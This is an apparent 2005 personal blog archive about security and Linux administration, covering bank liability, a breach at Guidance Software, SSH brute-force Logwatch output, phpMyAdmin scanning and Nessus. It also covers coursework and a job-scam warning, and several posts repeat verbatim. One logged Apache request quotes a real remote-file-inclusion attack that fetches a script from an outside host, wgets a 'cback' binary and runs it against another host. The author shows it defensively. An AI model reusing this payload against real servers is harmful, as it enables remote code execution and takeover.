Digital signatures sound cool -- imagine being able to sign a check using a digital signature to guarantee the check's authenticity and irrevocability. Unfortunately, there's a little difference proposed by most banks when dealing with digital signatures. Irrevocable means that if anything gets signed with your digital signature, the burden of proof is on you the consumer to prove it wasn't you. Currently, when you sign a check, the burden of proof is on the bank. If it's not your signature, you don't pay. It won't be that way using a digital signature.
Banks may say they protect you from fraud, but they really protect themselves. If your identity gets stolen, the burden of proof is yours to prove it's not you that owes all that money. When ATMs were first introduced, banks argued they were infallible and anyone claiming losses from wrongful ATM withdrawals must be trying to defraud the bank of money. It lasted until the banks went after criminals who stole from the "infallible" ATMs.
As banks and consumers go further into online transactions in the digital age, be wary. The banks are placing more and more liabilities on the consumer. When you engage in online banking, the terms of service you click "yes" to agree to generally state that all bank records are definitive. If the bank says you withdrew it, you withdrew it and that's that.
A couple of years ago, I sent my online credit card payment to the cable company by mistake. I tried in vain to get a refund and settled for having a credit on my account that would cover a year of cable. At the end of that year, the fraud investigator decided that she couldn't find the money in the cable company's accounting system, and removed the credit from my account. After I found my bank statement from a year earlier, faxed it to her, and got my bank to call, we cleared things up, but the burden of proof was on me. And my bank wasn't that helpful, either, insisting that I find the bank statements from a year ago or pay for a copy from them.
What was shocking was that a year after crediting the money into my account, the cable company couldn't track its own cash, and assumed it must have been some fraud. The burden of proof was on me, and I really didn't enjoy tracking down a bank statement from the year before.
Wednesday, December 21, 2005
Tuesday, December 20, 2005
Do As I Say, Not As I Do?
It's easy to miss news buried back in the business section given what's going on in the front section, but this is pretty harsh. Guidance Software, which makes audit software, was itself hacked. Just about everyone who is anyone in the computer forensic investigation world uses this software. The hacker(s?) got names, card numbers, including the CVV codes on the back, which aren't even supposed to be stored, according to Visa and Mastercard guidelines. In case you're wondering, Visa and MC spell out exactly what measures merchants should take to protect this data, and it appears that Guidance violated several of them, resulting in a massive catch for the hackers.
You'd think you'd be safe, purchasing software with a credit card from a premier security software company. Following these guidelines is more important than ever, since hackers are no longer interested in mere website defacements. They're going after the money.
Visit a bank. Note the security measures. They don't leave money lying around. Even if they did, it wouldn't be legal to steal it, but you also wouldn't keep your money there.
Saturday, December 10, 2005
A Couple of Schneier Entries Everyone Should Read
P>Security guru Bruce Schneier has a couple of recent news items on his blog that everyone should read. First off is the tale of backup tapes containing millions of banking records that were "lost." It turns out they weren't lost at all. The package control system was hacked to make the tape delivery a low-security item not requiring multiple signatures. After the package was stolen, hackers replaced the original security settings on the package. For companies that use paid off-site storage contractors, this is very scary.
Dr. Scheier's second entry is about a story in Nature, a scholarly scientific journal to which I subscribe and have used for writing reviews for my classes. Apparently, not everything in Nature is peer-reviewed, and a paper on a new type of encryption turned out to be almost complete bunk. Of course, you can't read the original piece in Nature without subscribing, (I got the student rate), but Schneier has an excellent critique.
Friday, December 9, 2005
What They Do at Other IST Schools
OK, picking out hacking attempts from logfiles is getting tired, so I promise, just one more. Apparently, at other IST schools, attempting to log on to other peoples' servers is what they teach. I see the entries regularly in my emails from Logwatch. What makes this one different is that it comes from an IST school like mine.
This brings up the (tired old) subject of University networks. They need to remain open and useful to students and professors, but they need to be protected from abuse and being used to abuse others. Preventing attacks like these from a campus would be hard. You could block port 22 outbound, but that would cut off a lot of legitimate activity. You could have all students sign an acceptable use policy, which might help you enforce rules against someone when you catch them. You could monitor network traffic for patterns like these, but that would involve monitoring a lot of network traffic at great expense. Universities charge enough without having to purchase a lot of monitoring equipment and software and hiring staff to watch its students, but this is what the Federal government wants them to do. Given how many attacks originate at Universities, it's easy to understand why. The Morris worm nearly took down the Internet from a University almost twenty years ago.
The more things change...
Logwatch entries:
sshd:
Authentication Failures:
unknown (ist.pct.edu): 101 Time(s)
apache (ist.pct.edu): 1 Time(s)
bin (ist.pct.edu): 1 Time(s)
mail (ist.pct.edu): 1 Time(s)
mysql (ist.pct.edu): 1 Time(s)
nobody (ist.pct.edu): 1 Time(s)
root (ist.pct.edu): 1 Time(s)
xfs (ist.pct.edu): 1 Time(s)
Invalid Users:
Unknown Account: 101 Time(s)
Failed logins from these:
admin/password from ::ffff:72.20.218.49: 1 Time(s)
adsl/password from ::ffff:72.20.218.49: 1 Time(s)
akon/password from ::ffff:72.20.218.49: 1 Time(s)
chun/password from ::ffff:72.20.218.49: 1 Time(s)
cisco/password from ::ffff:72.20.218.49: 1 Time(s)
cyd/password from ::ffff:72.20.218.49: 1 Time(s)
deamon/password from ::ffff:72.20.218.49: 1 Time(s)
dsl/password from ::ffff:72.20.218.49: 1 Time(s)
favorites/password from ::ffff:72.20.218.49: 1 Time(s)
fuji/password from ::ffff:72.20.218.49: 1 Time(s)
fujiwara/password from ::ffff:72.20.218.49: 1 Time(s)
fukumoto/password from ::ffff:72.20.218.49: 1 Time(s)
genki/password from ::ffff:72.20.218.49: 1 Time(s)
granlumie/password from ::ffff:72.20.218.49: 1 Time(s)
guest/password from ::ffff:72.20.218.49: 1 Time(s)
hagiwara/password from ::ffff:72.20.218.49: 1 Time(s)
hakko/password from ::ffff:72.20.218.49: 1 Time(s)
hayashi/password from ::ffff:72.20.218.49: 2 Time(s)
hayashy/password from ::ffff:72.20.218.49: 1 Time(s)
hiramara/password from ::ffff:72.20.218.49: 1 Time(s)
hiramaru/password from ::ffff:72.20.218.49: 1 Time(s)
hiroshi/password from ::ffff:72.20.218.49: 1 Time(s)
history/password from ::ffff:72.20.218.49: 1 Time(s)
hokko/password from ::ffff:72.20.218.49: 1 Time(s)
hokoyama/password from ::ffff:72.20.218.49: 1 Time(s)
horikoshi/password from ::ffff:72.20.218.49: 1 Time(s)
hotline/password from ::ffff:72.20.218.49: 1 Time(s)
hotmail/password from ::ffff:72.20.218.49: 1 Time(s)
ikanri/password from ::ffff:72.20.218.49: 1 Time(s)
info/password from ::ffff:72.20.218.49: 1 Time(s)
install/password from ::ffff:72.20.218.49: 1 Time(s)
internet/password from ::ffff:72.20.218.49: 1 Time(s)
invite/password from ::ffff:72.20.218.49: 1 Time(s)
iocha/password from ::ffff:72.20.218.49: 1 Time(s)
ishihara/password from ::ffff:72.20.218.49: 1 Time(s)
ito/password from ::ffff:72.20.218.49: 1 Time(s)
kajipar/password from ::ffff:72.20.218.49: 1 Time(s)
kakou/password from ::ffff:72.20.218.49: 1 Time(s)
kamata/password from ::ffff:72.20.218.49: 1 Time(s)
kamato/password from ::ffff:72.20.218.49: 1 Time(s)
kato/password from ::ffff:72.20.218.49: 1 Time(s)
kawakami/password from ::ffff:72.20.218.49: 1 Time(s)
kay/password from ::ffff:72.20.218.49: 1 Time(s)
ken/password from ::ffff:72.20.218.49: 1 Time(s)
kenkou/password from ::ffff:72.20.218.49: 1 Time(s)
kento/password from ::ffff:72.20.218.49: 1 Time(s)
kobe/password from ::ffff:72.20.218.49: 1 Time(s)
kohi/password from ::ffff:72.20.218.49: 1 Time(s)
kohitujikai/password from ::ffff:72.20.218.49: 1 Time(s)
kumemura/password from ::ffff:72.20.218.49: 1 Time(s)
lestat/password from ::ffff:72.20.218.49: 1 Time(s)
mac/password from ::ffff:72.20.218.49: 1 Time(s)
masumura/password from ::ffff:72.20.218.49: 1 Time(s)
matsuo/password from ::ffff:72.20.218.49: 1 Time(s)
mikata/password from ::ffff:72.20.218.49: 1 Time(s)
miura/password from ::ffff:72.20.218.49: 1 Time(s)
motoka/password from ::ffff:72.20.218.49: 1 Time(s)
motooka/password from ::ffff:72.20.218.49: 1 Time(s)
nakamoto/password from ::ffff:72.20.218.49: 1 Time(s)
nakamura/password from ::ffff:72.20.218.49: 1 Time(s)
nakayama/password from ::ffff:72.20.218.49: 1 Time(s)
new/password from ::ffff:72.20.218.49: 1 Time(s)
nuke/password from ::ffff:72.20.218.49: 1 Time(s)
otashiro/password from ::ffff:72.20.218.49: 1 Time(s)
play/password from ::ffff:72.20.218.49: 1 Time(s)
playboy/password from ::ffff:72.20.218.49: 1 Time(s)
proba/password from ::ffff:72.20.218.49: 1 Time(s)
prova/password from ::ffff:72.20.218.49: 1 Time(s)
prueba/password from ::ffff:72.20.218.49: 1 Time(s)
register/password from ::ffff:72.20.218.49: 1 Time(s)
robert/password from ::ffff:72.20.218.49: 1 Time(s)
roberto/password from ::ffff:72.20.218.49: 1 Time(s)
ryu/password from ::ffff:72.20.218.49: 1 Time(s)
saito/password from ::ffff:72.20.218.49: 1 Time(s)
sales/password from ::ffff:72.20.218.49: 2 Time(s)
search/password from ::ffff:72.20.218.49: 1 Time(s)
sesso/password from ::ffff:72.20.218.49: 1 Time(s)
sex/password from ::ffff:72.20.218.49: 1 Time(s)
shimada/password from ::ffff:72.20.218.49: 1 Time(s)
shiraki/password from ::ffff:72.20.218.49: 1 Time(s)
shiraky/password from ::ffff:72.20.218.49: 1 Time(s)
takato/password from ::ffff:72.20.218.49: 1 Time(s)
teraji/password from ::ffff:72.20.218.49: 1 Time(s)
test/password from ::ffff:72.20.218.49: 4 Time(s)
toi/password from ::ffff:72.20.218.49: 1 Time(s)
toy/password from ::ffff:72.20.218.49: 1 Time(s)
transfer/password from ::ffff:72.20.218.49: 1 Time(s)
trust/password from ::ffff:72.20.218.49: 1 Time(s)
try/password from ::ffff:72.20.218.49: 1 Time(s)
tujikai/password from ::ffff:72.20.218.49: 1 Time(s)
wap/password from ::ffff:72.20.218.49: 1 Time(s)
wara/password from ::ffff:72.20.218.49: 1 Time(s)
web/password from ::ffff:72.20.218.49: 1 Time(s)
www/password from ::ffff:72.20.218.49: 1 Time(s)
yamanaka/password from ::ffff:72.20.218.49: 1 Time(s)
yokoya/password from ::ffff:72.20.218.49: 1 Time(s)
Wednesday, November 30, 2005
Script Kiddies attack my Linux/Apache box
I am seeing attacks on popular open-source software that runs on linux, e.g.
129.27.140.4 - - [29/Nov/2005:23:00:48 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST
[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
http://148.81.141.12/cmd.gif?&cmd=cd%20/tmp;wget%20
131.155.98.128/cback;chmod%20744%20cback;./cback%20
194.112.220.37%208080;echo%20YYY;echo|
HTTP/1.1" 404 293 "-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1;)"
(I have broken the line up to fit. It's one entry, or request, from my Apache 2.0 log file. It's a Fedora Core 4 install, mostly default.)
These are slightly more complex attacks, and they show the difficulty of tracking down your attacker. The requester, 129.27.140.4 tracks here: optikom2.inw.tu-graz.ac.at, -- the Graz University of Technology in Austria. But the request is calling a script from here: lilo.pjwstk.edu.pl, the POLSKO-JAPONSKA WYZSZA SZKOLA TECHNIK KOMPUTEROWYCH in Poland. It uses more code from here: pc01.irce.tue.nl , someone's computer in the Netherlands. Finally, it looks like this server gets notified: 194.112.220.37: www.lbsschrems.at, WVNET Information und Kommunikation GmbH, somone's server in Austria. That server is running phpGroupWare, and has probably already been compromised and is now being used to compromise other machines. You could check for bugs in phpGroupWare, but their server's down.
The code here, http://131.155.98.128/cback, appears to be something in C that requires some include files. The initial script, here:
http://148.81.141.12/cmd.gif is a defacement script. Note that it doesn't open in Netscape -- just IE.
<!-- Defacing Tool 2.0 by r3v3ng4ns revengans@gmail.com se for modificar o codigo, por favor, mantenha o nome de seus autores originais e por favor, entre em contato comigo... ae galera, serio, tem mta gente fdp q simplismente usa, nao seja soh um sucker do script, n seja um lammer imbecil, n seja o merda dum script kiddie, n seja um babaca, ajude a melhora-lo tambem!! -->
At least our script writer left us his email address. He just wrote the code, of course, he's not the one trying to use it to deface a site. Right. There were additional lines in my Apache log file that showed attacks against other applications (not installed on my box): wordpress, phpgroupare, drupal and awstats. What weakness do these applications have in common? Xml-rpc on php.
It looks like Apache needs a tool similar to Windows/IIS's urlscan, which prevents attacks like these from getting to the webserver in the first place. These attacks are increasingly common, but there's no newspaper headlines, as was the case with attacks that took advantage of Microsoft vulnerabilities. These don't attack a single product, but holes in applications that are built on the ability to run things at the command line from a web request. It makes for great functionality and weak security.
Weak web applications may mean your firewall is really just a router for port 80 traffic.
Tuesday, November 29, 2005
A New Attack
Just when I was running out of memory to run my new photo gallery (Gallery 2),
I checked my log files to see what was causing some issues for me. It
turns out that Gallery2 and SELinux do not get along so well, but if
you edit your policy files, it can be made to work.
The new attack:
195.6.199.220 - - [28/Nov/2005:20:06:41 -0500] "GET /phpmyadmin/main.php HTTP/1.0" 404 296 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:41 -0500] "GET /PMA/main.php HTTP/1.0" 404 289 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /admin/main.php HTTP/1.0" 404 291 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /mysql/main.php HTTP/1.0" 404 291 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /dbadmin/main.php HTTP/1.0" 404 293 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /db/main.php HTTP/1.0" 404 288 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /web/phpMyAdmin/main.php HTTP/1.0" 404 300 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /admin/pma/main.php HTTP/1.0" 404 295 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /admin/phpmyadmin/main.php HTTP/1.0" 404 302 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /admin/mysql/main.php HTTP/1.0" 404 297 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /mysql-admin/main.php HTTP/1.0" 404 297 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /phpmyadmin2/main.php HTTP/1.0" 404 297 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /phpMyAdmin-2.5.4/main.php HTTP/1.0" 404 302 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /phpMyAdmin-2.2.6/main.php HTTP/1.0" 404 302 "-" "pmafind"
Apparently, there's a new tool out called "pmafind" looking for
phpmyadmin installs. I hadn't seen this one before. I guess enough
people have phpmyadmin installed in some unprotected directory to make
this worthwhile.
More attacks to come...
I checked my log files to see what was causing some issues for me. It
turns out that Gallery2 and SELinux do not get along so well, but if
you edit your policy files, it can be made to work.
The new attack:
195.6.199.220 - - [28/Nov/2005:20:06:41 -0500] "GET /phpmyadmin/main.php HTTP/1.0" 404 296 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:41 -0500] "GET /PMA/main.php HTTP/1.0" 404 289 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /admin/main.php HTTP/1.0" 404 291 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /mysql/main.php HTTP/1.0" 404 291 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /dbadmin/main.php HTTP/1.0" 404 293 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /db/main.php HTTP/1.0" 404 288 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /web/phpMyAdmin/main.php HTTP/1.0" 404 300 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /admin/pma/main.php HTTP/1.0" 404 295 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /admin/phpmyadmin/main.php HTTP/1.0" 404 302 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /admin/mysql/main.php HTTP/1.0" 404 297 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /mysql-admin/main.php HTTP/1.0" 404 297 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /phpmyadmin2/main.php HTTP/1.0" 404 297 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /phpMyAdmin-2.5.4/main.php HTTP/1.0" 404 302 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /phpMyAdmin-2.2.6/main.php HTTP/1.0" 404 302 "-" "pmafind"
Apparently, there's a new tool out called "pmafind" looking for
phpmyadmin installs. I hadn't seen this one before. I guess enough
people have phpmyadmin installed in some unprotected directory to make
this worthwhile.
More attacks to come...
Monday, November 21, 2005
Red Hat vs. Mandrake
I grew tired of updating every package that came with Mandrake. The
most frustrating part was not finding what I needed to install, or
installing it but then configure didn't find it.
I re-downloaded Fedora Core 4 in the DVD image, burned it on the Mac.
Macs can open, create and burn ISO images using the standard Disk Tools
utility. I checked the sha1sum on the Linux box that was the FTP
staging area, because OS X doesn't seem to have a sha1sum utility, and
I didn't feel like spending time downloading, configuring and
installing one. CuteFTP balked at downloading a 2.6 GB file, too,
insisting that there wasn't space on my hard disk for it, even though
there was plenty of space. Once again, Linux command line to the rescue.
Red Hat is now installed on my antique Inspiron 7500, and it's not
perfect yet -- I'm still working on the display. But much more software
works without endless downloads configure-make-make install cycles....
most frustrating part was not finding what I needed to install, or
installing it but then configure didn't find it.
I re-downloaded Fedora Core 4 in the DVD image, burned it on the Mac.
Macs can open, create and burn ISO images using the standard Disk Tools
utility. I checked the sha1sum on the Linux box that was the FTP
staging area, because OS X doesn't seem to have a sha1sum utility, and
I didn't feel like spending time downloading, configuring and
installing one. CuteFTP balked at downloading a 2.6 GB file, too,
insisting that there wasn't space on my hard disk for it, even though
there was plenty of space. Once again, Linux command line to the rescue.
Red Hat is now installed on my antique Inspiron 7500, and it's not
perfect yet -- I'm still working on the display. But much more software
works without endless downloads configure-make-make install cycles....
Friday, November 18, 2005
Nessus: Security Scanning on Linux and Windows
There are some great tools available for Linux. Unfortunately, a lot of people don't use them for a variety of reasons. They don't understand Linux, and there's no standard interface on Linux, except for the über-powerful command line. (I'm still annoyed that most distributions set the default boot to the GUI.)
Nessus is one of those tools. It installs easily from the command line and it has a friendly setup script. Once you complete it, you can start the Nessus server on your Linux box. Someone has even written a friendly Windows client for Nessus, so you can control your scans from Windows.
What's the point? Nessus is a powerful security scanner/vulnerability finder that probably matches most of what's on the market. It stores results to a database (or databases), has a diff feature so you can easily track changes over time, and has a great number of options. It has nearly 10,000 plugins to run platform-specific attacks, and it does a good job of OS fingerprinting.
So I continue experimenting with Nessus, of course, on my own systems. I can have a Nessus scan against my firewall open in one window and I can watch my firewall logs in another. (Remote syslog is cool. Who knew that even cheap routers can log to syslog?)
Competing products have sexier interfaces and reports, but they cost a lot more.
Monday, November 14, 2005
MRTG, Linksys, Linux and Apache
I have put my Linux box to good use, installing MRTG and monitoring the bandwidth usage of my router. It turned out to be a little less simple than I thought, and I also bricked my old Linksys router. The Linksys BEFVP41 v.1 had SNMP and access log sending. Its first replacement, the BEFVP41 v.2 has access log sending but no SNMP. Thus I'm up to a Netopia R9100 that was lying around, which has SNMP, but remote syslog for router activity only.
I also bought a nice new Linksys WRT54GS v.3, which I have modded with a couple of different custom firmware developments. So far, the DD-WRT has some stability issues, so I'm still trying to choose.
What I really want is a complete access log that I can check for patterns. I want to be able to see all the traffic hitting my external interface. Do I really have to buy something like a Watchguard X5 to do this?
I also figured out how to do remote syslog after some vexation. There are actually two syslog configuration files, one in /etc and the other in /etc/sysconfig. (The man pages fail to mention the difference...) With the localx config in /etc and the -r option in /etc/sysconfig, my router (Netopia R9100) now logs all firewall violations to /var/log/router.log . Sweet. Now I just need something to parse it, although it's interesting to just keep a tail -f open.
Friday, November 11, 2005
Progress
Back in the old days, (1990s) I had ISDN at home. It was the fastest bandwidth available, and it afforded me voice and fax and data all in one interface. (ISDN-BRI, with two B channels and one D channel for signalling, if you get technical.) Billing was awful. I paid two cents a minute per B channel during peak hours, and it took some tweaking to get it down. (Windows really does broadcast every eleven minutes, and that would bring up the data at two cents a minute.) Needless to say, I stayed up late at night to do large downloads.
I have gone through DSL and now I have cable at about 5 Megabits per second. I just downloaded Fedora Core 4 (Redhat's free testbed) and installed it on an old P3 system I have here. Federal Core 4 is 4 CDs, about 650 MB each. I had some trouble with the media checking, and the SHA-1 checks didn't check out, so I had to download them all again.
All in all, I think I downloaded over 5 GB of data over the past 24 hours. Back in 1998, this would have been unthinkable. Back then, you had to order the CDs, wait for them to arrive, and then install it. And installing Redhat 5.x, you had to know the IRQs and DMAs and which chip set your NIC had (I started hoarding DEC Tulip cards). Today, Redhat (and the other Linuxes) load up all my hardware automatically. I don't have to know anything about my hardware.
And the new linuxes have nice GUIs that launch by default. To log in at runlevel 3, you need to start tweak inittab. And VI has now been replaced with VIM.
All I wanted was a command line interface like I'm used to.
I have gone through DSL and now I have cable at about 5 Megabits per second. I just downloaded Fedora Core 4 (Redhat's free testbed) and installed it on an old P3 system I have here. Federal Core 4 is 4 CDs, about 650 MB each. I had some trouble with the media checking, and the SHA-1 checks didn't check out, so I had to download them all again.
All in all, I think I downloaded over 5 GB of data over the past 24 hours. Back in 1998, this would have been unthinkable. Back then, you had to order the CDs, wait for them to arrive, and then install it. And installing Redhat 5.x, you had to know the IRQs and DMAs and which chip set your NIC had (I started hoarding DEC Tulip cards). Today, Redhat (and the other Linuxes) load up all my hardware automatically. I don't have to know anything about my hardware.
And the new linuxes have nice GUIs that launch by default. To log in at runlevel 3, you need to start tweak inittab. And VI has now been replaced with VIM.
All I wanted was a command line interface like I'm used to.
CS vs. IS vs. IT
Computer Science and Information Systems are fundamentally different. In Information Systems, we might be able to use a more efficient compression algorithm, but unless the business rules call for it, we don't care. IS is about management of business rules and processes, although some CS folks seem to think it's just a survey of computer science for people who can't do calculus. We actually end up doing calculus for project management to predict what our chances are of finishing a project on time. IS also covers organizational behavior.
I come from an Information Technology background. When I started talking about IT in an IS context, my professors quickly corrected me. Technology -- whatever it is -- should support business processes. Where technology can transform an organization is where IS fits in. Servers, routers, switches, and software are what you build IS implementations on. IS covers transaction support systems, management information systems, and decision support systems. IS is part of the business school; CS is part of the engineering school. IT is taught at vo-tech schools.
IS is why restaurants serve hamburgers with a pound of beef. By analyzing restaurant ordering system logs, it became apparent that giant burgers bring customers in and make more money for the restaurant chain. Computer scientists can write the DBMS that holds the data, and IT people can manage the hardware and the software, but the IS people design the system.
So when people start lumping everything together, IT/IS/CS, they are covering a lot of different areas. Some even talk about a degree in IT, which doesn't exist, at least not until Microsoft creates its own university. (Which McDonald's has.)
Tuesday, November 8, 2005
All Classes will be on Wednesdays this Spring.
I just registered for the spring semester. All classes I need are on Wednesday evening, so I will be in class from 6pm until 10pm.
Wednesday:
Computerized Decision Systems - MGT 226 10
Database Systems - MGT 284 10
Monday: (my elective)
Topics in Higher Level Languages (Java) - MGT 283 10
I wasn't planning on a higher level language this spring, much less Java, but the professor has her own book on object oriented programming using Java, so it's hard to resist. Maybe I'll learn something.
All the other electives I wanted to take were also on Wednesday evening.
Wednesday:
Computerized Decision Systems - MGT 226 10
Database Systems - MGT 284 10
Monday: (my elective)
Topics in Higher Level Languages (Java) - MGT 283 10
I wasn't planning on a higher level language this spring, much less Java, but the professor has her own book on object oriented programming using Java, so it's hard to resist. Maybe I'll learn something.
All the other electives I wanted to take were also on Wednesday evening.
Job Fraud
With so many people using the Internet to look for new and better jobs, a new Internet scam has begun. I keep getting emails like this:
Your resume came to us through one of our partners and we would like to set an appointment to meet with you. Albert & Alexander Associates helps direct senior executives and managers to the best jobs in the Washington DC area. We steward our clients careers, maximizing their earning potential and job satisfaction.
If you are interested in learning more, please visit (link) and complete our assessment. Someone will contact you shortly if we feel we can be of assistance.
Best Regards,
Albert & Alexander Associates
This is different from other, legitimate job emails from comanies and recruiters I would love to work with. These guys are like Bernard Haldane, who have been caught ripping job seekers off with the promise of uncovering the "secret job market." The saddest parts are the misspellings in the subject line: "We recieved your resume" and how the return address ( washingtoncareers@gmail.com ) doesn't work.So Monster-résumé-posters beware, there is a new way for scam artists to find you. What makes this suspicious?
- There's no specific job listed.
- No pre-screen questions: US citizen, clearance, how much $ you want.
- The "assessment" requires your salary from every job on your résumé.
- Lack of specifics.
- Lack of contactibility of recruiters. The real recruiters I've spoken with are efficient, polite, and quick to respond.
- Return email is a gmail address, even though this outfit has its own domain.
Object Oriented Development
Everybody keeps asking me what they teach in Information Systems grad school, so I'm going to start discussing it here.
Basically, we're still learning System Development Lifecycle, in several different forms. Structured, Rapid Application Development, Extreme (Xtreme!) Programming, and finally Object-Oriented.
Object Oriented is not just a higher-level language any more. It's a whole development method with its own techniques, tools and diagrams. These diagrams, more or less, replace dataflow diagrams and entity relationship diagrams, although I think every database should have a good ERD.
Some of my classmates were still confused and/or think OO development is a fad. It slowed class up a little. A fair misunderstanding is the database side. What's an object oriented database? Well, we're not really sure yet. OO programming still uses databases -- traditional databases. From the diagrams and textbook, this wasn't clear, leading to the question, "Where does the data go if you turn the system off?"
It's still there, in a database, just like structured approach.
Basically, we're still learning System Development Lifecycle, in several different forms. Structured, Rapid Application Development, Extreme (Xtreme!) Programming, and finally Object-Oriented.
Object Oriented is not just a higher-level language any more. It's a whole development method with its own techniques, tools and diagrams. These diagrams, more or less, replace dataflow diagrams and entity relationship diagrams, although I think every database should have a good ERD.
Some of my classmates were still confused and/or think OO development is a fad. It slowed class up a little. A fair misunderstanding is the database side. What's an object oriented database? Well, we're not really sure yet. OO programming still uses databases -- traditional databases. From the diagrams and textbook, this wasn't clear, leading to the question, "Where does the data go if you turn the system off?"
It's still there, in a database, just like structured approach.
Subscribe to:
Posts (Atom)